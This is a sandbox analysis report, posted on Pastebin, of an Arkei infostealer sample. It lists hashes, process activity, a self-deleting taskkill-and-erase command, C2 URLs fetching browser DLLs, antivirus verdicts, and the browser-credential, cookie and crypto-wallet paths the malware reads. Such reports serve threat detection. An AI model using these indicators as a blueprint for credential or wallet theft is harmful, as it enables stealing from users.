API tools faq
paste
Advertisement
paladin316

1234Arkei_21f7a26bb9e91117169edfd7d3967cfb_exe_2019-09-06_10_30.txt

paladin316
Sep 6th, 2019
2,197
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 48.53 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * ID: 1234
  3. * MalFamily: "Arkei"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_21f7a26bb9e91117169edfd7d3967cfb.exe"
  8. * File Size: 1338368
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "7716c84415ccd122f0ad35d15a26b63f09956202c4bb1004e31a5952c771df83"
  11. * MD5: "21f7a26bb9e91117169edfd7d3967cfb"
  12. * SHA1: "89448a5b10e160ccfe85138944a2ff3f988d51b8"
  13. * SHA512: "8e92478041ec3a504b7b59158bfcd6b7bacb21c1c8990be379e0a4099c8a38764ee7a42ccf74b3fff3b57f8464eab2793cbceab516317c5b34164d6f10f59221"
  14. * CRC32: "83995902"
  15. * SSDEEP: "24576:0FooK+7+Qu5HwaFQWC+2tiuxkmPzqPJ9EPZadN1vL9wC7AU6nxpbdK:CKYl0HwaCWC+2AatPzqPJ4QXHc7"
  16.  
  17. * Process Execution:
  18. "9z25yPQnjM.exe",
  19. "9z25yPQnjM.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "WmiPrvSE.exe",
  26. "svchost.exe",
  27. "taskeng.exe",
  28. "taskeng.exe",
  29. "msoia.exe",
  30. "msoia.exe",
  31. "taskeng.exe",
  32. "WMIADAP.exe"
  33.  
  34.  
  35. * Executed Commands:
  36. "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
  37. "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
  38. "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
  39. "C:\\Windows\\system32\\lsass.exe",
  40. "taskkill /im 9z25yPQnjM.exe /f",
  41. "taskeng.exe 211F1106-53AB-4021-868B-2F49FACAB8E4 S-1-5-18:NT AUTHORITY\\System:Service:",
  42. "taskeng.exe D7A509EA-AB99-4E2A-B99E-04EE4FF35A33 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  43. "taskeng.exe 6E5C69F1-55AA-4A7A-B970-656893D7C708 S-1-5-18:NT AUTHORITY\\System:Service:",
  44. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
  45. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
  46. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
  47. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
  48.  
  49.  
  50. * Signatures Detected:
  51.  
  52. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  53. "Details":
  54.  
  55.  
  56. "Description": "Behavioural detection: Executable code extraction",
  57. "Details":
  58.  
  59.  
  60. "Description": "Creates RWX memory",
  61. "Details":
  62.  
  63.  
  64. "Description": "Anomalous file deletion behavior detected (10+)",
  65. "Details":
  66.  
  67. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp"
  68.  
  69.  
  70. "DeletedFile": "C:\\ProgramData\\freebl3.dll"
  71.  
  72.  
  73. "DeletedFile": "C:\\ProgramData\\mozglue.dll"
  74.  
  75.  
  76. "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
  77.  
  78.  
  79. "DeletedFile": "C:\\ProgramData\\nss3.dll"
  80.  
  81.  
  82. "DeletedFile": "C:\\ProgramData\\softokn3.dll"
  83.  
  84.  
  85. "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
  86.  
  87.  
  88. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt"
  89.  
  90.  
  91. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill"
  92.  
  93.  
  94. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt"
  95.  
  96.  
  97. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC"
  98.  
  99.  
  100. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
  101.  
  102.  
  103. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
  104.  
  105.  
  106. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
  107.  
  108.  
  109. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies"
  110.  
  111.  
  112. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt"
  113.  
  114.  
  115. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt"
  116.  
  117.  
  118. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads"
  119.  
  120.  
  121. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt"
  122.  
  123.  
  124. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History"
  125.  
  126.  
  127. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt"
  128.  
  129.  
  130. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt"
  131.  
  132.  
  133. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg"
  134.  
  135.  
  136. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy"
  137.  
  138.  
  139. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft"
  140.  
  141.  
  142. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin"
  143.  
  144.  
  145. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin"
  146.  
  147.  
  148. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin"
  149.  
  150.  
  151. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore"
  152.  
  153.  
  154. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin"
  155.  
  156.  
  157. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin"
  158.  
  159.  
  160. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash"
  161.  
  162.  
  163. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum"
  164.  
  165.  
  166. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC"
  167.  
  168.  
  169. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum"
  170.  
  171.  
  172. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus"
  173.  
  174.  
  175. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin"
  176.  
  177.  
  178. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko"
  179.  
  180.  
  181. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin"
  182.  
  183.  
  184. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD"
  185.  
  186.  
  187. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin"
  188.  
  189.  
  190. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin"
  191.  
  192.  
  193. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin"
  194.  
  195.  
  196. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX"
  197.  
  198.  
  199. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin"
  200.  
  201.  
  202. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin"
  203.  
  204.  
  205. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin"
  206.  
  207.  
  208. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge"
  209.  
  210.  
  211. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin"
  212.  
  213.  
  214. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin"
  215.  
  216.  
  217. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin"
  218.  
  219.  
  220. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin"
  221.  
  222.  
  223. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash"
  224.  
  225.  
  226. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets"
  227.  
  228.  
  229. "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip"
  230.  
  231.  
  232. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe"
  233.  
  234.  
  235. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  236.  
  237.  
  238.  
  239.  
  240. "Description": "Guard pages use detected - possible anti-debugging.",
  241. "Details":
  242.  
  243.  
  244. "Description": "A process attempted to delay the analysis task.",
  245. "Details":
  246.  
  247. "Process": "taskeng.exe tried to sleep 421 seconds, actually delayed analysis time by 0 seconds"
  248.  
  249.  
  250. "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  251.  
  252.  
  253.  
  254.  
  255. "Description": "Performs HTTP requests potentially not found in PCAP.",
  256. "Details":
  257.  
  258. "url_ioc": "dersed.com:80//288"
  259.  
  260.  
  261. "url_ioc": "dersed.com:80//freebl3.dll"
  262.  
  263.  
  264. "url_ioc": "dersed.com:80//mozglue.dll"
  265.  
  266.  
  267. "url_ioc": "dersed.com:80//msvcp140.dll"
  268.  
  269.  
  270. "url_ioc": "dersed.com:80//nss3.dll"
  271.  
  272.  
  273. "url_ioc": "dersed.com:80//softokn3.dll"
  274.  
  275.  
  276. "url_ioc": "dersed.com:80//vcruntime140.dll"
  277.  
  278.  
  279. "url_ioc": "ip-api.com:80//line/"
  280.  
  281.  
  282.  
  283.  
  284. "Description": "A process created a hidden window",
  285. "Details":
  286.  
  287. "Process": "9z25yPQnjM.exe -> C:\\Windows\\System32\\cmd.exe"
  288.  
  289.  
  290. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
  291.  
  292.  
  293.  
  294.  
  295. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  296. "Details":
  297.  
  298. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  299.  
  300.  
  301. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  302.  
  303.  
  304. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  305.  
  306.  
  307. "suspicious_request_iocs": "http://dersed.com/288"
  308.  
  309.  
  310. "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
  311.  
  312.  
  313. "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
  314.  
  315.  
  316. "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
  317.  
  318.  
  319. "suspicious_request_iocs": "http://dersed.com/nss3.dll"
  320.  
  321.  
  322. "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
  323.  
  324.  
  325. "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
  326.  
  327.  
  328. "suspicious_request_iocs": "http://ip-api.com/line/"
  329.  
  330.  
  331. "suspicious_request_iocs": "http://dersed.com/"
  332.  
  333.  
  334.  
  335.  
  336. "Description": "Performs some HTTP requests",
  337. "Details":
  338.  
  339. "url_iocs": "http://dersed.com/288"
  340.  
  341.  
  342. "url_iocs": "http://dersed.com/freebl3.dll"
  343.  
  344.  
  345. "url_iocs": "http://dersed.com/mozglue.dll"
  346.  
  347.  
  348. "url_iocs": "http://dersed.com/msvcp140.dll"
  349.  
  350.  
  351. "url_iocs": "http://dersed.com/nss3.dll"
  352.  
  353.  
  354. "url_iocs": "http://dersed.com/softokn3.dll"
  355.  
  356.  
  357. "url_iocs": "http://dersed.com/vcruntime140.dll"
  358.  
  359.  
  360. "url_iocs": "http://ip-api.com/line/"
  361.  
  362.  
  363. "url_iocs": "http://dersed.com/"
  364.  
  365.  
  366.  
  367.  
  368. "Description": "The binary likely contains encrypted or compressed data.",
  369. "Details":
  370.  
  371. "section": "name: .rsrc, entropy: 7.94, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x000dd400, virtual_size: 0x000dd3c8"
  372.  
  373.  
  374.  
  375.  
  376. "Description": "Uses Windows utilities for basic functionality",
  377. "Details":
  378.  
  379. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  380.  
  381.  
  382. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
  383.  
  384.  
  385. "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
  386.  
  387.  
  388.  
  389.  
  390. "Description": "Behavioural detection: Injection (Process Hollowing)",
  391. "Details":
  392.  
  393. "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
  394.  
  395.  
  396.  
  397.  
  398. "Description": "Executed a process and injected code into it, probably while unpacking",
  399. "Details":
  400.  
  401. "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
  402.  
  403.  
  404.  
  405.  
  406. "Description": "Deletes its original binary from disk",
  407. "Details":
  408.  
  409.  
  410. "Description": "Behavioural detection: Injection (inter-process)",
  411. "Details":
  412.  
  413.  
  414. "Description": "Steals private information from local Internet browsers",
  415. "Details":
  416.  
  417. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
  418.  
  419.  
  420. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
  421.  
  422.  
  423. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  424.  
  425.  
  426. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  430.  
  431.  
  432. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  436.  
  437.  
  438.  
  439.  
  440. "Description": "Collects information about installed applications",
  441. "Details":
  442.  
  443. "Program": "Google Update Helper"
  444.  
  445.  
  446. "Program": "Microsoft Excel MUI 2013"
  447.  
  448.  
  449. "Program": "Microsoft Outlook MUI 2013"
  450.  
  451.  
  452.  
  453.  
  454. "Program": "Google Chrome"
  455.  
  456.  
  457. "Program": "Adobe Flash Player 29 NPAPI"
  458.  
  459.  
  460. "Program": "Adobe Flash Player 29 ActiveX"
  461.  
  462.  
  463. "Program": "Microsoft DCF MUI 2013"
  464.  
  465.  
  466. "Program": "Microsoft Access MUI 2013"
  467.  
  468.  
  469. "Program": "Microsoft Office Proofing Tools 2013 - English"
  470.  
  471.  
  472. "Program": "Adobe Acrobat Reader DC"
  473.  
  474.  
  475. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  476.  
  477.  
  478. "Program": "Microsoft Publisher MUI 2013"
  479.  
  480.  
  481. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  482.  
  483.  
  484. "Program": "Microsoft Office Shared MUI 2013"
  485.  
  486.  
  487. "Program": "Microsoft Office OSM MUI 2013"
  488.  
  489.  
  490. "Program": "Microsoft InfoPath MUI 2013"
  491.  
  492.  
  493. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  494.  
  495.  
  496. "Program": "Microsoft Word MUI 2013"
  497.  
  498.  
  499. "Program": "Microsoft Groove MUI 2013"
  500.  
  501.  
  502.  
  503.  
  504. "Program": "Microsoft Access Setup Metadata MUI 2013"
  505.  
  506.  
  507. "Program": "Microsoft Office OSM UX MUI 2013"
  508.  
  509.  
  510. "Program": "Java Auto Updater"
  511.  
  512.  
  513. "Program": "Microsoft PowerPoint MUI 2013"
  514.  
  515.  
  516. "Program": "Microsoft Office Professional Plus 2013"
  517.  
  518.  
  519. "Program": "Adobe Refresh Manager"
  520.  
  521.  
  522. "Program": "Microsoft Office Proofing 2013"
  523.  
  524.  
  525.  
  526.  
  527. "Program": "Microsoft OneNote MUI 2013"
  528.  
  529.  
  530.  
  531.  
  532. "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
  533. "Details":
  534.  
  535. "MicroWorld-eScan": "Trojan.GenericKD.32391018"
  536.  
  537.  
  538. "McAfee": "Artemis!21F7A26BB9E9"
  539.  
  540.  
  541. "CrowdStrike": "win/malicious_confidence_100% (W)"
  542.  
  543.  
  544. "BitDefender": "Trojan.GenericKD.32391018"
  545.  
  546.  
  547. "K7GW": "Riskware ( 0040eff71 )"
  548.  
  549.  
  550. "K7AntiVirus": "Riskware ( 0040eff71 )"
  551.  
  552.  
  553. "TrendMicro": "Mal_HPGen-37b"
  554.  
  555.  
  556. "Symantec": "ML.Attribute.HighConfidence"
  557.  
  558.  
  559. "ESET-NOD32": "a variant of Win32/GenKryptik.DSFF"
  560.  
  561.  
  562. "APEX": "Malicious"
  563.  
  564.  
  565. "Paloalto": "generic.ml"
  566.  
  567.  
  568. "GData": "Win32.Trojan-Stealer.Vidar.HFQMXD"
  569.  
  570.  
  571. "Kaspersky": "Trojan.Win32.Chapak.dywh"
  572.  
  573.  
  574. "Avast": "FileRepMetagen Malware"
  575.  
  576.  
  577. "Endgame": "malicious (high confidence)"
  578.  
  579.  
  580. "Sophos": "Mal/Generic-S"
  581.  
  582.  
  583. "F-Secure": "Trojan.TR/Chapak.pfzxh"
  584.  
  585.  
  586. "Invincea": "heuristic"
  587.  
  588.  
  589. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.tc"
  590.  
  591.  
  592. "Trapmine": "suspicious.low.ml.score"
  593.  
  594.  
  595. "FireEye": "Generic.mg.21f7a26bb9e91117"
  596.  
  597.  
  598. "Emsisoft": "Trojan.GenericKD.32391018 (B)"
  599.  
  600.  
  601. "Avira": "TR/Chapak.pfzxh"
  602.  
  603.  
  604. "Microsoft": "Trojan:Win32/Tiggre!plock"
  605.  
  606.  
  607. "Arcabit": "Trojan.Generic.D1EE3F6A"
  608.  
  609.  
  610. "AegisLab": "Trojan.Win32.Chapak.4!c"
  611.  
  612.  
  613. "ZoneAlarm": "Trojan.Win32.Chapak.dywh"
  614.  
  615.  
  616. "Acronis": "suspicious"
  617.  
  618.  
  619. "VBA32": "BScope.TrojanPSW.Zbot"
  620.  
  621.  
  622. "Ad-Aware": "Trojan.GenericKD.32391018"
  623.  
  624.  
  625. "Malwarebytes": "Spyware.PredatorTheThief"
  626.  
  627.  
  628. "TrendMicro-HouseCall": "Mal_HPGen-37b"
  629.  
  630.  
  631. "Rising": "Trojan.Generic@ML.89 (RDML:DwZEfvt+IvzJSolmz/PxXA)"
  632.  
  633.  
  634. "Ikarus": "Trojan.Crypt"
  635.  
  636.  
  637. "Fortinet": "W32/Kryptik.GVSM!tr"
  638.  
  639.  
  640. "AVG": "FileRepMetagen Malware"
  641.  
  642.  
  643. "Qihoo-360": "Win32/Trojan.abe"
  644.  
  645.  
  646.  
  647.  
  648. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  649. "Details":
  650.  
  651.  
  652. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  653. "Details":
  654.  
  655. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  656.  
  657.  
  658. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12"
  659.  
  660.  
  661. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\*.*"
  662.  
  663.  
  664. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
  665.  
  666.  
  667. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  668.  
  669.  
  670. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\*.*"
  671.  
  672.  
  673. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  674.  
  675.  
  676. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n"
  677.  
  678.  
  679. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  680.  
  681.  
  682. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\"
  683.  
  684.  
  685. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  686.  
  687.  
  688. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\*.*"
  689.  
  690.  
  691. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\*.*"
  692.  
  693.  
  694. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  695.  
  696.  
  697. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\"
  698.  
  699.  
  700. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  701.  
  702.  
  703. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\*.*"
  704.  
  705.  
  706. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  707.  
  708.  
  709. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\"
  710.  
  711.  
  712. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  713.  
  714.  
  715. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  716.  
  717.  
  718. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\"
  719.  
  720.  
  721. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  722.  
  723.  
  724. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\*.*"
  725.  
  726.  
  727. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  728.  
  729.  
  730. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\"
  731.  
  732.  
  733. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\*.*"
  734.  
  735.  
  736. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  737.  
  738.  
  739. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\"
  740.  
  741.  
  742. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  743.  
  744.  
  745. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  746.  
  747.  
  748. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\*.*"
  749.  
  750.  
  751. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  752.  
  753.  
  754. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\"
  755.  
  756.  
  757. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  758.  
  759.  
  760. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\*.*"
  761.  
  762.  
  763. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  764.  
  765.  
  766. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\"
  767.  
  768.  
  769. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\*.*"
  770.  
  771.  
  772. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  773.  
  774.  
  775. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  776.  
  777.  
  778. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\*.*"
  779.  
  780.  
  781. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  782.  
  783.  
  784. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\"
  785.  
  786.  
  787. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  788.  
  789.  
  790. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\"
  791.  
  792.  
  793. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\*.*"
  794.  
  795.  
  796. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  797.  
  798.  
  799. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\"
  800.  
  801.  
  802. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\*.*"
  803.  
  804.  
  805. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  806.  
  807.  
  808. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  809.  
  810.  
  811. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  812.  
  813.  
  814. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\"
  815.  
  816.  
  817. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  818.  
  819.  
  820. "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\*.*"
  821.  
  822.  
